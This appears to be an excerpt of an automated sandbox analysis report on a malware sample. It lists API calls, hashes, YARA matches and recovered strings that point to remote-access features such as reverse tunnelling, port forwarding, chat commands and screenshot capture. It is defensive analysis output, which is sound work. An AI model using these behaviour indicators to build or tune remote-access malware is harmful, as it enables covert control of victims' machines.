                                                                                                                                                                • Opcode Fuzzy Hash: 1a5ca54b36596ad37749563d119fc4e68a20727be45026b500f5852c660b9b47
                                                                                                                                                                • Instruction Fuzzy Hash: EAC12072D40204ABDB20DBE8CC42FEE77F8AF4A740F154565FA15EB283E67499418B60
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID: 1o
                                                                                                                                                                • API String ID: 3702945584-528613903
                                                                                                                                                                • Opcode ID: 1ae5767a561f4eea347a88aab661198834847f5a7cba01b9f8ce696ad55903b8
                                                                                                                                                                • Instruction ID: 999a82a42e216875fefb96f896db99d9fa9697104d5c18c4e69e14f8a23f19af
                                                                                                                                                                • Opcode Fuzzy Hash: 1ae5767a561f4eea347a88aab661198834847f5a7cba01b9f8ce696ad55903b8
                                                                                                                                                                • Instruction Fuzzy Hash: 7F51FD39A04A548BDF309F688984BCA7FB6FF4B318F244169D9146B344DB74F401CBA6
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00061D72,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000982F2
                                                                                                                                                                • GetLastError.KERNEL32(?,?,00061D72,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000982FF
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00098306
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00061D72,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00098332
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00061D72,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0009833C
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00098343
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00061D72,?), ref: 00098386
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00061D72,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00098390
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00098397
                                                                                                                                                                • _free.LIBCMT ref: 000983A3
                                                                                                                                                                • _free.LIBCMT ref: 000983AA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2441525078-0
                                                                                                                                                                • Opcode ID: 6047d9576b1cc76c52c454a02ffe3d3b6e0a79d62afc4e57db0712cc65ebe25d
                                                                                                                                                                • Instruction ID: 01b13acd2337a63d2d317f01ef525371e1d6b1a6f573739ed836ab997b5617a4
                                                                                                                                                                • Opcode Fuzzy Hash: 6047d9576b1cc76c52c454a02ffe3d3b6e0a79d62afc4e57db0712cc65ebe25d
                                                                                                                                                                • Instruction Fuzzy Hash: 6F318172904609BFDF159FA5CC45CEF3BB8AF47720B148259F81056291DF358E11EBA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetStdHandle.KERNEL32(FFFFFFF5,?,?,?,?,?,?,?,?,?,?,?,?,?,6FE76885,6FEA4A78), ref: 6FE7CE67
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FE76885,6FEA4A78), ref: 6FE7CE76
                                                                                                                                                                • GetConsoleMode.KERNEL32(00000000,?), ref: 6FE7CEBA
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,6FEACC54,6FEAE46C,?,?,6FEAE45C), ref: 6FE7D15A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$CloseConsoleErrorLastMode
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$Po$Po$called `Result::unwrap()` on an `Err` value$xJo
                                                                                                                                                                • API String ID: 1170577072-1019422048
                                                                                                                                                                • Opcode ID: 1eeb953b36ca0d6c30a973971ba8b0ead987fb5a54ae2882d4e71a1d953d5b42
                                                                                                                                                                • Instruction ID: 88bed7024994e5ccba1cf747cfd64a50c37bfa1ec77db39698b74de7d723367b
                                                                                                                                                                • Opcode Fuzzy Hash: 1eeb953b36ca0d6c30a973971ba8b0ead987fb5a54ae2882d4e71a1d953d5b42
                                                                                                                                                                • Instruction Fuzzy Hash: 4FA1A174D04298DBDB20CFA8C840BEEBFBAEF06314F24455AE455BB381DB35A945CB61
                                                                                                                                                                APIs
                                                                                                                                                                • SetEvent.KERNEL32(?,?), ref: 000655F8
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 000656A8
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 000656B7
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 000656C2
                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,000D1F58), ref: 0006577A
                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 000657B2
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                • API String ID: 2956720200-749203953
                                                                                                                                                                • Opcode ID: 4c0fe178e854c091b282dbba73b285c3f1e75cc1be9b9abd0d3f4f66e1b3c23d
                                                                                                                                                                • Instruction ID: 81de1e533ef48e70c855e9856ee0def6c87fa28067642e370d0fb516ab8d4c60
                                                                                                                                                                • Opcode Fuzzy Hash: 4c0fe178e854c091b282dbba73b285c3f1e75cc1be9b9abd0d3f4f66e1b3c23d
                                                                                                                                                                • Instruction Fuzzy Hash: 0141BD71608701ABD714FB74DC4ADEE77EAAB85700F404A2CF94687196EF39CA04C792
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: 220d2afd9c82e6368d6ce5b433ee876d9bfaf2b4f8ec301b8003cc35818b91e9
                                                                                                                                                                • Instruction ID: 7d4454db7b2d7385fb7fb3538c5a9da40082f225d3a390060b1f6dbd996f8228
                                                                                                                                                                • Opcode Fuzzy Hash: 220d2afd9c82e6368d6ce5b433ee876d9bfaf2b4f8ec301b8003cc35818b91e9
                                                                                                                                                                • Instruction Fuzzy Hash: AA11A77591151ABFCF05EF54CD41CDA3B66FF443A0F418095F9184B121DA35DA50AFC4
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 100059EA
                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                • _free.LIBCMT ref: 100059F6
                                                                                                                                                                • _free.LIBCMT ref: 10005A01
                                                                                                                                                                • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                • _free.LIBCMT ref: 10005A17
                                                                                                                                                                • _free.LIBCMT ref: 10005A22
                                                                                                                                                                • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                • _free.LIBCMT ref: 10005A38
                                                                                                                                                                • _free.LIBCMT ref: 10005A43
                                                                                                                                                                • _free.LIBCMT ref: 10005A51
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                APIs
                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6FE945B5
                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6FE946C3
                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6FE94815
                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6FE94830
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                 • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                 • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                • String ID: csm$csm$csm$*;
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 6FE7CB56
                                                                                                                                                                • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00000800,00000000), ref: 6FE7CB83
                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000800,00000000), ref: 6FE7CC07
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFormatHandleLastMessageModule
                                                                                                                                                                • String ID: Ho$NTDLL.DLL$`o%$assertion failed: self.is_char_boundary(new_len)/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\alloc\src\string.rs$wo
                                                                                                                                                                APIs
                                                                                                                                                                • __EH_prolog.LIBCMT ref: 000782AB
                                                                                                                                                                • GdiplusStartup.GDIPLUS(000D1AA4,?,00000000), ref: 000782DD
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00078369
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 000783EF
                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 000783F7
                                                                                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 000784E6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTimechar_traits
                                                                                                                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 0006A2DD
                                                                                                                                                                  • Part of subcall function 0006A213: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0006A2EA), ref: 0006A249
                                                                                                                                                                  • Part of subcall function 0006A213: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0006A2EA), ref: 0006A258
                                                                                                                                                                  • Part of subcall function 0006A213: Sleep.KERNEL32(00002710,?,?,?,0006A2EA), ref: 0006A285
                                                                                                                                                                  • Part of subcall function 0006A213: CloseHandle.KERNEL32(00000000,?,?,?,0006A2EA), ref: 0006A28C
                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0006A319
                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0006A32A
                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0006A341
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0006A3BF
                                                                                                                                                                  • Part of subcall function 0007A6EF: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,0006A3E4), ref: 0007A70C
                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,000C8878,?,00000000,00000000,00000000,00000000,00000000), ref: 0006A4C8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                • String ID: 8!$8!
                                                                                                                                                                APIs
                                                                                                                                                                • InitOnceBeginInitialize.KERNEL32(?,00000000,00000000,00000000,?,?,6FE80194), ref: 6FEA4DAA
                                                                                                                                                                • TlsAlloc.KERNEL32(?,6FE80194), ref: 6FEA4DC2
                                                                                                                                                                • InitOnceComplete.KERNEL32(?,00000000,00000000,?,6FE80194), ref: 6FEA4DF2
                                                                                                                                                                • TlsAlloc.KERNEL32(?,?,6FE80194,6FED31B8,6FE80A00,FFFFFFFF,?,6FE7AF6E), ref: 6FEA4DFC
                                                                                                                                                                • TlsFree.KERNEL32(6FE80A00,?,6FE80194,6FED31B8,6FE80A00,FFFFFFFF,?,6FE7AF6E), ref: 6FEA4E27
                                                                                                                                                                • InitOnceComplete.KERNEL32(?,00000004,00000000,00000000,6FEAE640), ref: 6FEA4E5A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitOnce$AllocComplete$BeginFreeInitialize
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$1o
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                APIs
                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1454806937-0
                                                                                                                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$_abort_memcmp
                                                                                                                                                                • String ID: C
                                                                                                                                                                • API String ID: 137591632-1037565863
                                                                                                                                                                • Opcode ID: 65b6dfeed970d30f29b561820a0c73ec9e978bf76f6e83e0adf15eddcf8448bd
                                                                                                                                                                • Instruction ID: 1d57f5520dd35a74221dceddaffcd19fc34e3816b6132d172975f3ca6f1befd9
                                                                                                                                                                • Opcode Fuzzy Hash: 65b6dfeed970d30f29b561820a0c73ec9e978bf76f6e83e0adf15eddcf8448bd
                                                                                                                                                                • Instruction Fuzzy Hash: C5C14975A0122A9FDF24DF28C884BADB7B5FF48314F5085AAD809A7350D771AE91CF84
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6FE749C3
                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000002,00000000), ref: 6FE749CE
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE749DA
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE749EC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$EnvironmentVariable
                                                                                                                                                                • String ID: uo&$uo&
                                                                                                                                                                • API String ID: 2691138088-4100988267
                                                                                                                                                                • Opcode ID: e79c8c4c0cb493071adef1bd3502a4f024b148445924a07a23adb4f71e22d9a6
                                                                                                                                                                • Instruction ID: 223a4f45fcfdf44279fd4779cf71e5b17eeb234dc6fc5e7e264e74b3766406fa
                                                                                                                                                                • Opcode Fuzzy Hash: e79c8c4c0cb493071adef1bd3502a4f024b148445924a07a23adb4f71e22d9a6
                                                                                                                                                                • Instruction Fuzzy Hash: AA8170B1E00219DBDB208FA8D845BDDBFB5FF45318F24412AE814B7340EB75A954CB91
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Eventinet_ntoa
                                                                                                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                                                                                • API String ID: 3578746661-168337528
                                                                                                                                                                • Opcode ID: 97654dcdd13d0928d0830d68fc649d03cc2cdcd550a9de1e2076be80035f5ddb
                                                                                                                                                                • Instruction ID: bd9509a0512381a1586f51e469e384c03e93f8efb54ec29f7d831ce3d23a0910
                                                                                                                                                                • Opcode Fuzzy Hash: 97654dcdd13d0928d0830d68fc649d03cc2cdcd550a9de1e2076be80035f5ddb
                                                                                                                                                                • Instruction Fuzzy Hash: 9051B131A042059BD644F738D85ABEE36A7AB95310F408629F44A872E7EE2C8E45C7D7
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6FE74783
                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6FE7478B
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE74797
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE747A9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE74843
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$CurrentDirectory
                                                                                                                                                                • String ID: uo&$uo&
                                                                                                                                                                • API String ID: 3993060814-4100988267
                                                                                                                                                                • Opcode ID: 5de9db260095c3810e1a0771333349602f18eb3ff58f9e5701f288658a7a6bd5
                                                                                                                                                                • Instruction ID: fb6171d91239a1d2e66869e5afeead557843a912a439a8da09a383c2ff6c1fb3
                                                                                                                                                                • Opcode Fuzzy Hash: 5de9db260095c3810e1a0771333349602f18eb3ff58f9e5701f288658a7a6bd5
